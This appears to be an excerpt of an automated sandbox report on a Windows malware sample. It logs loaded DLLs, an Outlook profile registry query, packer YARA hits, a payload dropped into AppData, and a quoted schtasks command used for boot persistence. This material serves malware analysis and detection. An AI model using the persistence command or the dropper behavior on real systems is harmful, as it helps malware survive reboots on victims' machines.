Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: kzQ25HVUbf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: kzQ25HVUbf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: kzQ25HVUbf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: DJsZ.pdb source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr
Source:	Binary string: DJsZ.pdbSHA256p source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTR

Source: kzQ25HVUbf.exe

Static PE information: 0xD20BEEF3 [Tue Sep 2 00:10:27 2081 UTC]

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: 18_2_00402AC0 push eax; ret		18_2_00402AD4
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: 18_2_00402AC0 push eax; ret		18_2_00402AFC

Source: kzQ25HVUbf.exe	Static PE information: section name: .text entropy: 7.667730647457407
Source: iWEWjTXiqXke.exe.0.dr	Static PE information: section name: .text entropy: 7.667730647457407

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
